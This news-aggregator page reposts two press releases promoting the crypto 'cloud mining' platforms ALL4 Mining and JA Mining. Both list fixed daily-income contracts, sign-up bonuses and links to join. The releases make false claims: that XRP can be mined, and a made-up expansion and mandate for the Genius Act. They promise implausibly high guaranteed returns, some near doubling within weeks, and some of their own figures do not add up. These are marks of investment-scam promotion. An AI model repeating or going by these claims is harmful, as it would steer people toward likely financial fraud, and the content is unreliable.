  • MIL-OSI: The Genius Act Fuels XRP Cloud Mining Innovation Through ALL4 Mining’s Eco-Friendly Platform

    Source: GlobeNewswire (MIL-OSI)

    New York City, NY, July 21, 2025 (GLOBE NEWSWIRE) — The blockchain industry is rapidly evolving, with regulatory frameworks and technological innovations driving new ways to participate in digital asset mining and investment. One of the recent milestones driving this change is the Genius Act, which aims to promote sustainable and inclusive growth of blockchain technology. ALL4 Mining has seized this opportunity to integrate XRP mining capabilities into its cloud platform, creating new opportunities for investors seeking low-barrier, environmentally friendly and stable returns.

    What Is the Genius Act?

    The Genius Act—short for Global Economic Nexus for Inclusive Utility and Sustainability—is a progressive law that encourages blockchain innovation while emphasizing environmental responsibility and user protection. It aims to reduce regulatory obstacles, foster green mining practices, and support scalable cryptocurrencies with proven efficiency and compliance.
    This framework opens doors for platforms to adopt clean energy-powered mining solutions, ensuring crypto investment can grow without the high energy costs and environmental concerns traditionally linked to mining.

    ALL4 Mining: Transforming Cryptocurrency Mining

    raditional cryptocurrency mining often demands expensive hardware, technical know-how, and enormous energy consumption, making it inaccessible to many investors. ALL4 Mining revolutionizes this by offering a cloud mining system that relies on distributed computing power and renewable energy. Users lease computing power contracts instead of buying physical equipment, significantly lowering entry barriers.
    The platform’s architecture consists of multiple eco-friendly data centers that handle the mining operations remotely. This setup makes mining more flexible, cost-effective, and environmentally sustainable—aligned perfectly with the Genius Act’s objectives.

    Why XRP Mining Matters in This Context

    XRP is a standout cryptocurrency known for its fast transaction speeds, low fees, and high scalability. It is also recognized for its comparatively low energy consumption, which makes it ideal for eco-conscious investors and platforms aiming for sustainability.
    ALL4 Mining’s integration of XRP mining contracts is a strategic move to combine XRP’s advantages with the Genius Act’s environmental mandates. This enables users to mine XRP in a way that is simple, legal, and aligned with the growing global demand for green financial products
    How ALL4 Mining Works with XRP
    ALL4 Mining simplifies mining through cloud computing power leasing. Here’s how users can get started:
    1.Register an Account: New users receive a $15 welcome bonus, encouraging easy entry into the platform.
    2.Choose a Contract: Select from a variety of XRP computing power contracts tailored to different investment levels.
    3.Start Mining: The system automatically mines XRP on your behalf, with daily income credited directly to your account.
    4.Monitor Earnings: Real-time dashboards provide full transparency and allow users to track performance anytime.
    This structure removes the complexities of traditional mining, making XRP accessible to individual miners, small businesses, and larger mining pools alike.

    Contract Packages Tailored to Investors

    ALL4 Mining offers a range of mining contracts not only for XRP but also for other major cryptocurrencies, allowing investors flexibility and choice:

    BTC basic computing power: investment amount: $100, contract period: 2 days, daily income of $4.0, expiration income: $100 + $8

    LTC [classic computing power contract]: investment amount: $600, contract period: 6 days, daily income of $7.2, expiration income: $600 + $43.2

    BTC [classic computing power contract]: investment amount: $3,000, contract period: 20 days, daily income of $42, expiration income: $3,000 + $840

    DOGE [classic computing power contract]: investment amount: $5,000, contract period: 31 days, daily income of $74, expiration income: $5,000 + $2,294

    BTC [advanced computing power contract]: investment amount: $10,000, contract period: 40 days, daily income of $170, expiration income: $10,000 + $680

    BTC [advanced computing power contract]: investment amount: 50,000 USD, contract period: 48 days, daily income: USD 930, maturity income: USD 50,000 + USD 44,640

    BTC [Super Computing Power Contract]: Investment amount: USD 150,000, contract period: 45 days, daily income: USD 3,000, maturity income: USD 150,000 + USD 135,000

    Large-scale investors can explore premium packages, such as $300,000 contracts, which deliver over $288,000 in profits in just 40 days.

    Such diversity allows investors to customize their mining participation according to risk tolerance and financial goals.

    Environmental and Security Benefits

    One of the Genius Act’s core tenets is to encourage mining platforms to reduce their environmental impact. ALL4 Mining delivers on this by powering its data centers with renewable energy sources, significantly lowering the carbon footprint compared to traditional mining farms.
    Furthermore, the platform employs advanced SSL encryption and cybersecurity protocols, safeguarding user data and assets. Its commitment to regulatory compliance offers investors legal peace of mind, which is increasingly important in today’s dynamic crypto regulatory landscape.

    The Broader Impact: Making Crypto Mining Inclusive and Profitable
    The Genius Act and ALL4 Mining’s XRP integration jointly contribute to making cryptocurrency mining more accessible, affordable, and responsible. By eliminating the need for costly hardware and reducing energy consumption, the platform enables a broader audience to participate in mining activities.
    For XRP enthusiasts and investors, this is particularly promising. XRP’s growing use in cross-border payments and financial services means that mined tokens can be utilized or traded in a vibrant market with strong liquidity. Coupled with ALL4 Mining’s user-friendly platform, mining XRP becomes not just a technical exercise but a practical investment opportunity.

    How to Start Your XRP Mining Journey

    To begin mining XRP with ALL4 Mining, users simply:
    · Visit the official website and create an account.
    · Choose a contract that fits their budget and investment strategy.
    · Enjoy daily passive income as the platform’s cloud infrastructure mines XRP on their behalf.
    · Access customer support 24/7 for any assistance.
    The platform’s flexibility ensures that investors can start small and scale their mining power as confidence and experience grow.

    Conclusion

    The Genius Act has created a regulatory environment that encourages sustainable blockchain innovation and reduces barriers for crypto investors. ALL4 Mining’s integration of XRP mining under this framework offers a pioneering solution that is efficient, secure, and environmentally responsible.
    By combining XRP’s technical strengths with ALL4 Mining’s advanced cloud infrastructure, investors gain access to a low-cost, high-yield, and eco-friendly mining platform. This synergy not only supports financial inclusion but also sets a new standard for how digital assets should be mined in the modern era.

    For those interested in tapping into XRP’s potential through cloud mining, ALL4 Mining stands out as a trusted and forward-looking choice—built for the future of cryptocurrency.
    For more information and to start mining XRP today, visit: https://all4mining.com/
    For direct Questions Please Email: info@all4mining.com

    Attachment

    • All4 mining

    The MIL Network –

    July 21, 2025
  • MIL-OSI: XRP Holds Above $3.50 as On-Chain Activity Accelerates — JA Mining Responds with Dual-Income Cloud Mining Contracts

    Source: GlobeNewswire (MIL-OSI)

    London, United Kingdom, July 21, 2025 (GLOBE NEWSWIRE) — XRP has remained resilient over the past 24 hours, trading steadily between $3.50 and $3.55, with a current price of $3.52, reflecting a 2.3% daily gain. While price volatility has moderated, on-chain data shows rising transaction volume, new wallet activity, and open interest in XRP derivatives—signaling renewed institutional momentum.

    In response to these structural shifts, global cloud mining platform JA Mining has launched a new line of dual-income mining contracts, allowing investors to earn daily fixed returns while capturing upside potential if token prices appreciate during the contract term. The contracts are accessible via XRP, BTC, ETH, DOGE, and other major cryptocurrencies.

    Market Context: Activity Deepens Beyond Price

    Recent data indicates XRP’s on-chain activity and derivatives exposure are both on the rise, with total open interest in XRP futures surpassing $10.4 billion. Analysts note that while price corrections may occur, long-term capital continues to accumulate—shifting focus from speculative short-term plays to structured income strategies.

    JA Mining’s latest offering reflects this shift by introducing a product model designed to balance risk and reward: a fixed-income contract structure that also lets users benefit from crypto market upside.

    Dual-Income Structure: Predictable Returns + Market Gains

    Once activated, each contract provides:

    • Stable daily income (USD-equivalent)
    • Payouts in the original invested cryptocurrency (e.g., XRP in, XRP out)
    • Capital appreciation benefits if the token rises during the contract term

    Example: A user allocates $5,800 worth of XRP into a 3-day contract, receiving $249.60 per day, totaling $748.80. If XRP gains 10% over the same period, the final payout in XRP also appreciates proportionally, boosting the overall return.

    Mining Contract Examples (Updated July 2025)

    LTC Classic Miner – $200 | 2 Days | $7/day → Total: $14

    DOGE Innovative Miner – $2,420 | 3 Days | $86.88/day → Total: $260.63

    DOGE Quality Choice – $12,500 | 3 Days | $535/day → Total: $1,605

    BTC Intelligent Innovation – $55,600 | 2 Days | $4,770/day → Total: $9,540.96

    BTC Efficient & Excellent – $258,000 | 5 Days | $24,664.80/day → Total: $123,324

    For more plans, please visit the official website: https://jamining.com

    Fully Online, Green-Powered, and Globally Accessible

    JA Mining operates 100% online, with instant contract activation and real-time earnings tracking. The platform is accessible in over 100 countries, requiring no mining hardware or technical setup. All operations are powered by renewable energy, aligning with global ESG priorities.

    Key features include:

    • Investment support for XRP, BTC, ETH, DOGE, and more
    • No hardware, no manual configuration
    • Automated daily payouts
    • Multilingual user support
    • $100 signup bonus for new users

    About JA Mining

    JA Mining is a global cloud-based cryptocurrency mining platform offering short-term contracts with daily returns. Built around transparency, automation, and sustainability, JA Mining empowers users of all experience levels to generate mining income without the complexity of traditional setups. Supporting major digital assets such as XRP, Bitcoin, Ethereum, and Dogecoin, the platform delivers a simple yet powerful entry point into structured crypto investment.

     Get started now with a $100 bonus and zero setup required: https://jamining.com

    Media Contact: JA Mining

     info@jamining.com

     www.jamining.com

    Attachment

    The MIL Network –

    July 21, 2025
←Previous Page
1 … 261 262 263 264 265 … 5,912
Next Page→
NewzIntel.com

NewzIntel.com

MIL Open Source Intelligence

  • Blog
  • About
  • FAQs
  • Authors
  • Events
  • Shop
  • Patterns
  • Themes

Twenty Twenty-Five

Designed with WordPress